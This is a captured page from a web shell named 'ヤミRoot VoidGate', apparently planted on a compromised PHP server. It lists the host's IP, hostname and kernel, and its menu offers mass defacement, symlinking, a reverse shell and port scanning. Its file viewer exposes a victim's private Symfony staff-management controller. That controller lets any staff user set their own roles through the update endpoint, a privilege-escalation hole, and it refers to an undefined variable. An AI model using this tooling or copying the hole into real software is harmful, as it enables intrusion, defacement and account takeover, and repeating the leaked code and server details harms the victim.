ヤミRoot VoidGate
User / IP
:
216.73.216.137
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
src
/
AppBundle
/
Controller
/
Api
/
Viewing: CompanyStaffController.php
<?php namespace AppBundle\Controller\Api; use FOS\RestBundle\Controller\FOSRestController; use FOS\RestBundle\Controller\Annotations as Rest; use Sensio\Bundle\FrameworkExtraBundle\Configuration\ParamConverter; use Symfony\Component\HttpFoundation\Request; use Symfony\Component\HttpFoundation\Response; use Symfony\Component\HttpFoundation\JsonResponse; use Nelmio\ApiDocBundle\Annotation as Doc; use Sensio\Bundle\FrameworkExtraBundle\Configuration\Security; use AppBundle\Entity\Company; use AppBundle\Entity\Address; use AppBundle\Entity\Staff; use AppBundle\Form\StaffType; use AppBundle\Form\AddressType; class CompanyStaffController extends FOSRestController { /** * Get the list of all staffs of a comany * @param integer $companyId The id of the company * @Rest\Get("/companies/{companyId}/staffs") * @Rest\View( * statusCode = Response::HTTP_OK, * SerializerGroups = {"STAFF_DETAILS"} *) * @Doc\ApiDoc( * section="Staffs of a company", * resource=true, * description="Get the list of all staffs of a company.", * ) * @Security("has_role('ROLE_AGENCY_ADMIN') or has_role('ROLE_COMPANY_ADMIN')") */ public function listAction(Company $company) { //TODO $staffs = $this ->getDoctrine() ->getRepository('AppBundle:Staff') ->findByCompany($company); return $staffs; } /** * Get one staff of a comany * @param integer $companyId The id of the company * @param integer $id The id of the staff * @Rest\Get("/companies/{companyId}/staffs/{id}") * @ParamConverter("company", options={"mapping": {"companyId": "companyId"}}) * @Rest\View( * statusCode = Response::HTTP_OK, * SerializerGroups = {"LIST", "STAFF_DETAILS"} *) * @Doc\ApiDoc( * section="Staffs of a company", * resource=true, * description="Get one staff of a company.", * ) * @Security("has_role('ROLE_AGENCY_ADMIN') or has_role('ROLE_COMPANY_ADMIN')") */ public function showAction(Company $company, Staff $staff) { //TODO if ($staff->getCompany() != $company) { return new JsonResponse(['error' => 'This staff does not belong to this company '], Response::HTTP_METHOD_NOT_ALLOWED); } return $staff; } /** * Create one staff for a comany * * @param integer $companyId The id of the company * @Rest\Post("/companies/{companyId}/staffs") * @Rest\View( * statusCode = Response::HTTP_CREATED, * SerializerGroups = {"LIST", "STAFF_DETAILS"} * ) * @Doc\ApiDoc( * section="Staffs of a company", * resource=true, * description="Create one staff of a company.", * input = { * "class"="AppBundle\Form\StaffType", * }, * output = { * "class"="", * } * ) * @Security("has_role('ROLE_COMPANY_ADMIN')") */ public function createAction(Request $request, Company $company) { //TODO $staff = new Staff(); $form = $this->createForm(StaffType::class, $staff); $form->submit($request->request->all(), false); $listErrors = $this->get('validator')->validate($staff); if (count($listErrors)) { return $this->view($listErrors, Response::HTTP_BAD_REQUEST); } /* * the bloc below directly sets an address for the agency if a key "address" is specified in the request body * if the key in not found the new fresh address will remain empty. */ $address = new Address(); if ($request->request->has("address")) { $form = $this->createForm(AddressType::class, $address); $form->submit($request->get("address"), false); $listErrors = $this->get('validator')->validate($address); if (count($listErrors)) { return $this->view($listErrors, Response::HTTP_BAD_REQUEST); } } $staff->setAddress($address); if ($request->request->has("roles")) $staff->setRoles($request->request->get("roles")); $encoder = $this->get('security.password_encoder'); // password encoding $encoded = $encoder->encodePassword($staff, $staff->getPlainPassword()); $staff->setPassword($encoded); /** * No errors at this point */ $staff->setCompany($company); $em = $this ->getDoctrine() ->getManager(); $em->persist($staff); $em->flush(); //at this point we have created the staff if(in_array($staff->getRoles()[0], array("ROLE_OPERATOR","ROLE_CONTROLLER", "ROLE_AGENCY_ADMIN"))){ $pkiServer = $this->container->get('itravel.pki_node_server'); $res1 = $pkiServer->createUserCert($staff, $cust->getPlainPassword()); } /** * Create public/private key for the staff * * $pkiServer = $this->container->get('etravel.pki.node.server'); * $success = $pkiServer->createAndSaveStaffCert($staff, $staff->getPlainPassword()); */ return $staff; } /** * Update one staff of a comany * @param integer $companyId The id of the company * @param integer $id The id of the staff * @Rest\Put("/companies/{companyId}/staffs/{id}") * @Rest\View( * statusCode = Response::HTTP_ACCEPTED, * SerializerGroups = {"LIST", "STAFF_DETAILS"} * ) * @Doc\ApiDoc( * section="Staffs of a company", * resource=true, * description="Update one staff of a company.", * input = { * "class"="AppBundle\Form\StaffType", * }, * output = { * "class"="", * } * ) * @Security("has_role('ROLE_STAFF')") */ public function updateAction(Request $request, Staff $staff) { $checker = $this->get('security.authorization_checker'); if(!$checker->isGranted('ROLE_AGENCY_ADMIN') AND !$checker->isGranted('ROLE_COMPANY_ADMIN')){ $connectedUser = $this->get('security.token_storage')->getToken()->getUser(); if(!$staff->isEqualTo($connectedUser)){ return new JsonResponse(['error' => "Cannot update another user's data"], Response::HTTP_METHOD_NOT_ALLOWED); } } //processing submitted data $form = $this->createForm(StaffType::class, $staff); $form->submit($request->request->all(), false); // false correspond a la valeur du parametre 'clearMissing' qui empèche au formulaire de mettre la valeur null aux champs ne figurant pas dans le corps de la requête $listErrors = $this->get('validator')->validate($staff); if (count($listErrors)) { return $this->view($listErrors, Response::HTTP_BAD_REQUEST); } if ($request->request->has("roles")) $staff->setRoles($request->request->get("roles")); // if the staff wants to change password if (!empty($staff->getPlainPassword())) { $encoder = $this->get('security.password_encoder'); $encoded = $encoder->encodePassword($staff, $staff->getPlainPassword()); $staff->setPassword($encoded); } // No more errors at this point $em = $this ->getDoctrine() ->getManager(); $em->flush(); return $staff; } /** * Delete one staff of a comany * @param integer $companyId The id of the company * @param integer $id The id of the staff * @Rest\Delete("/companies/{companyId}/staffs/{id}") * @Rest\View( * statusCode = Response::HTTP_NO_CONTENT *) * @Doc\ApiDoc( * section="Staffs of a company", * resource=true, * description="Delete one staff of a company.", * ) * @Security("has_role('ROLE_AGENCY_ADMIN') or has_role('ROLE_COMPANY_ADMIN')") */ public function deleteAction(Company $company, Staff $staff) { //processing submitted data if ($staff->getCompany() != $company) { return new JsonResponse(['error' => 'This staff does not belong to this company '], Response::HTTP_METHOD_NOT_ALLOWED); } $staff->setIsActive(false); // No more errors at this point $em = $this ->getDoctrine() ->getManager(); $em->flush(); return new JsonResponse(''); } }
Coded With 💗 by
0x6ick